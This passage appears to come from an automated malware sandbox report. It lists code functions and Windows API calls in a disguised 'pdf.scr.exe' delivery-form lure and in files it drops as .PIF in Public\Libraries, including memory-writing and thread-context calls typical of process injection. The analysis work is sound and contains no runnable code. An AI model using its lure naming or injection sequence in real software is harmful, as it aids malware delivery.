                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Code function: 5_2_02887D00 NtWriteVirtualMemory,5_2_02887D00
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Code function: 5_2_02888BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,5_2_02888BAE
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Code function: 5_2_028879B2 NtAllocateVirtualMemory,5_2_028879B2
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Code function: 5_2_0288D9F0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,5_2_0288D9F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E035C0 NtCreateMutant,LdrInitializeThunk,8_2_31E035C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02B60 NtClose,LdrInitializeThunk,8_2_31E02B60
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_31E02DF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_31E02C70
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E03090 NtSetValueKey,8_2_31E03090
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E03010 NtOpenDirectoryObject,8_2_31E03010
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E039B0 NtGetContextThread,8_2_31E039B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E03D70 NtOpenThread,8_2_31E03D70
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E03D10 NtOpenProcessToken,8_2_31E03D10
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E04340 NtSetContextThread,8_2_31E04340
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E04650 NtSuspendThread,8_2_31E04650
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02BE0 NtQueryValueKey,8_2_31E02BE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02BF0 NtAllocateVirtualMemory,8_2_31E02BF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02BA0 NtEnumerateValueKey,8_2_31E02BA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02B80 NtQueryInformationFile,8_2_31E02B80
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02AF0 NtWriteFile,8_2_31E02AF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02AD0 NtReadFile,8_2_31E02AD0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02AB0 NtWaitForSingleObject,8_2_31E02AB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02DD0 NtDelayExecution,8_2_31E02DD0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02DB0 NtEnumerateKey,8_2_31E02DB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02D30 NtUnmapViewOfSection,8_2_31E02D30
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02D00 NtSetInformationFile,8_2_31E02D00
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02D10 NtMapViewOfSection,8_2_31E02D10
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02CF0 NtOpenProcess,8_2_31E02CF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02CC0 NtQueryVirtualMemory,8_2_31E02CC0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02CA0 NtQueryInformationToken,8_2_31E02CA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02C60 NtCreateKey,8_2_31E02C60
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02C00 NtQueryInformationProcess,8_2_31E02C00
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02FE0 NtCreateFile,8_2_31E02FE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02FA0 NtQuerySection,8_2_31E02FA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02FB0 NtResumeThread,8_2_31E02FB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02F90 NtProtectVirtualMemory,8_2_31E02F90
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02F60 NtCreateProcessEx,8_2_31E02F60
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02F30 NtCreateSection,8_2_31E02F30
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02EE0 NtQueueApcThread,8_2_31E02EE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02EA0 NtAdjustPrivilegesToken,8_2_31E02EA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02E80 NtReadVirtualMemory,8_2_31E02E80
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 8_2_31E02E30 NtWriteVirtualMemory,8_2_31E02E30
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_029485DC CreateProcessAsUserW,0_2_029485DC
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_029320C4 0_2_029320C4
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_004189A3 3_2_004189A3
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_00402870 3_2_00402870
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_004010E0 3_2_004010E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_0042F143 3_2_0042F143
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_0040496A 3_2_0040496A
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_004101D3 3_2_004101D3
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_00403230 3_2_00403230
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_004012C0 3_2_004012C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_0040E3CA 3_2_0040E3CA
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_0040E3D3 3_2_0040E3D3
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_004103F3 3_2_004103F3
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_00416B9E 3_2_00416B9E
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_00416BA3 3_2_00416BA3
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_0040E518 3_2_0040E518
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_0040E523 3_2_0040E523
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_004025B0 3_2_004025B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A04EA80 3_2_2A04EA80
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A10AB40 3_2_2A10AB40
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A106BD7 3_2_2A106BD7
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A052840 3_2_2A052840
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A05A840 3_2_2A05A840
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0368B8 3_2_2A0368B8
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A07E8F0 3_2_2A07E8F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A066962 3_2_2A066962
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0529A0 3_2_2A0529A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A11A9A6 3_2_2A11A9A6
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A10EE26 3_2_2A10EE26
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A050E59 3_2_2A050E59
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A10CE93 3_2_2A10CE93
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A062E90 3_2_2A062E90
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A10EEDB 3_2_2A10EEDB
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A092F28 3_2_2A092F28
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A070F30 3_2_2A070F30
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0F2F30 3_2_2A0F2F30
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C4F40 3_2_2A0C4F40
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0CEFA0 3_2_2A0CEFA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A042FC8 3_2_2A042FC8
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A050C00 3_2_2A050C00
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0F0CB5 3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A040CF2 3_2_2A040CF2
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A05AD00 3_2_2A05AD00
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0ECD1F 3_2_2A0ECD1F
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A068DBF 3_2_2A068DBF
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A04ADE0 3_2_2A04ADE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0F0274 3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0D02C0 3_2_2A0D02C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A10A352 3_2_2A10A352
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A05E3F0 3_2_2A05E3F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A1103E6 3_2_2A1103E6
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0E2000 3_2_2A0E2000
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A040100 3_2_2A040100
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EA118 3_2_2A0EA118
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0D8158 3_2_2A0D8158
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A1041A2 3_2_2A1041A2
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A1101AA 3_2_2A1101AA
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A1081CC 3_2_2A1081CC
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A06C6E0 3_2_2A06C6E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A074750 3_2_2A074750
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A050770 3_2_2A050770
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A04C7C0 3_2_2A04C7C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0F4420 3_2_2A0F4420
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A102446 3_2_2A102446
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0FE4F6 3_2_2A0FE4F6
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A050535 3_2_2A050535
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A110591 3_2_2A110591
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A107A46 3_2_2A107A46
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A10FA49 3_2_2A10FA49
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C3A6C 3_2_2A0C3A6C
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0EDAAC 3_2_2A0EDAAC
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A095AA0 3_2_2A095AA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0F1AA3 3_2_2A0F1AA3
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0FDAC6 3_2_2A0FDAC6
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A10FB76 3_2_2A10FB76
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A06FB80 3_2_2A06FB80
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A08DBF9 3_2_2A08DBF9
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0C5BF0 3_2_2A0C5BF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0BD800 3_2_2A0BD800
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0538E0 3_2_2A0538E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A0E5910 3_2_2A0E5910
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A059950 3_2_2A059950
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A06B950 3_2_2A06B950
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A059EB0 3_2_2A059EB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A10FF09 3_2_2A10FF09
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A051F92 3_2_2A051F92
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A10FFB1 3_2_2A10FFB1
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A013FD2 3_2_2A013FD2
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Code function: 3_2_2A013FD5 3_2_2A013FD5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C9C323_2_2A0C9C32
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10FCF23_2_2A10FCF2
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A053D403_2_2A053D40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A101D5A3_2_2A101D5A
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A107D733_2_2A107D73
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06FDC03_2_2A06FDC0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0552A03_2_2A0552A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06B2C03_2_2A06B2C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F12ED3_2_2A0F12ED
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06D2F03_2_2A06D2F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10132D3_2_2A10132D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03D34C3_2_2A03D34C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A09739A3_2_2A09739A
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0FF0CC3_2_2A0FF0CC
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0570C03_2_2A0570C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10F0E03_2_2A10F0E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1070E93_2_2A1070E9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A08516C3_2_2A08516C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03F1723_2_2A03F172
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A11B16B3_2_2A11B16B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A05B1B03_2_2A05B1B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0956303_2_2A095630
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1016CC3_2_2A1016CC
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10F7B03_2_2A10F7B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10F43F3_2_2A10F43F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0414603_2_2A041460
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1075713_2_2A107571
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0ED5B03_2_2A0ED5B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1195C33_2_2A1195C3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_004015603_1_00401560
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_004020583_1_00402058
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_004010E03_1_004010E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_004032303_1_00403230
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_004012C03_1_004012C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_004033503_1_00403350
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_004015533_1_00401553
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_004025B03_1_004025B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_004028703_1_00402870
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_00401D693_1_00401D69
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_00401D703_1_00401D70
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: 5_2_028720C45_2_028720C4
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DDB1B08_2_31DDB1B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E9B16B8_2_31E9B16B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E0516C8_2_31E0516C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DBF1728_2_31DBF172
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E870E98_2_31E870E9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8F0E08_2_31E8F0E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD70C08_2_31DD70C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E7F0CC8_2_31E7F0CC
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E1739A8_2_31E1739A
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DBD34C8_2_31DBD34C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8132D8_2_31E8132D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E712ED8_2_31E712ED
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DEB2C08_2_31DEB2C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DED2F08_2_31DED2F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD52A08_2_31DD52A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E995C38_2_31E995C3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E6D5B08_2_31E6D5B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E875718_2_31E87571
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DC14608_2_31DC1460
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8F43F8_2_31E8F43F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8F7B08_2_31E8F7B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E816CC8_2_31E816CC
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E156308_2_31E15630
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD99508_2_31DD9950
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DEB9508_2_31DEB950
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E659108_2_31E65910
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD38E08_2_31DD38E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E3D8008_2_31E3D800
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E45BF08_2_31E45BF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E0DBF98_2_31E0DBF9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DEFB808_2_31DEFB80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8FB768_2_31E8FB76
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E7DAC68_2_31E7DAC6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E15AA08_2_31E15AA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E71AA38_2_31E71AA3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E6DAAC8_2_31E6DAAC
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E43A6C8_2_31E43A6C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8FA498_2_31E8FA49
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E87A468_2_31E87A46
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DEFDC08_2_31DEFDC0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E87D738_2_31E87D73
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD3D408_2_31DD3D40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E81D5A8_2_31E81D5A
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8FCF28_2_31E8FCF2
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E49C328_2_31E49C32
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31D93FD28_2_31D93FD2
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31D93FD58_2_31D93FD5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD1F928_2_31DD1F92
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8FFB18_2_31E8FFB1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8FF098_2_31E8FF09
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD9EB08_2_31DD9EB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E881CC8_2_31E881CC
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E901AA8_2_31E901AA
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E841A28_2_31E841A2
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E581588_2_31E58158
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DC01008_2_31DC0100
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E6A1188_2_31E6A118
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E620008_2_31E62000
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E903E68_2_31E903E6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DDE3F08_2_31DDE3F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8A3528_2_31E8A352
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E502C08_2_31E502C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E702748_2_31E70274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E905918_2_31E90591
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD05358_2_31DD0535
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E7E4F68_2_31E7E4F6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E824468_2_31E82446
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E744208_2_31E74420
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DCC7C08_2_31DCC7C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DF47508_2_31DF4750
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD07708_2_31DD0770
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DEC6E08_2_31DEC6E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E9A9A68_2_31E9A9A6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD29A08_2_31DD29A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DE69628_2_31DE6962
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DFE8F08_2_31DFE8F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DB68B88_2_31DB68B8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DDA8408_2_31DDA840
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD28408_2_31DD2840
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E86BD78_2_31E86BD7
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8AB408_2_31E8AB40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DCEA808_2_31DCEA80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DCADE08_2_31DCADE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DE8DBF8_2_31DE8DBF
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DDAD008_2_31DDAD00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E6CD1F8_2_31E6CD1F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DC0CF28_2_31DC0CF2
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E70CB58_2_31E70CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD0C008_2_31DD0C00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DC2FC88_2_31DC2FC8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E4EFA08_2_31E4EFA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E44F408_2_31E44F40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E12F288_2_31E12F28
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E72F308_2_31E72F30
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DF0F308_2_31DF0F30
